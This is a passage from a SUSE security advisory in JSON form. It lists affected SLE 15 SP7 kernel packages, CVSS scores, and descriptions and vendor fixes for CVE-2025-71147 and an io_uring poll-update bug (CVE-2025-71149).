"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.7,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-11T14:05:07Z",
"details": "moderate"
}
],
"title": "CVE-2025-71147"
},
{
"cve": "CVE-2025-71149",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71149"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nio_uring/poll: correctly handle io_poll_add() return value on update\n\nWhen the core of io_uring was updated to handle completions\nconsistently and with fixed return codes, the POLL_REMOVE opcode\nwith updates got slightly broken. If a POLL_ADD is pending and\nthen POLL_REMOVE is used to update the events of that request, if that\nupdate causes the POLL_ADD to now trigger, then that completion is lost\nand a CQE is never posted.\n\nAdditionally, ensure that if an update does cause an existing POLL_ADD\nto complete, that the completion value isn\u0027t always overwritten with\n-ECANCELED. For that case, whatever io_poll_add() set the value to\nshould just be retained.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71149",
"url": "https://www.suse.com/security/cve/CVE-2025-71149"
},
{
"category": "external",
"summary": "SUSE Bug 1257164 for CVE-2025-71149",
"url": "https://bugzilla.suse.com/1257164"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.3,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
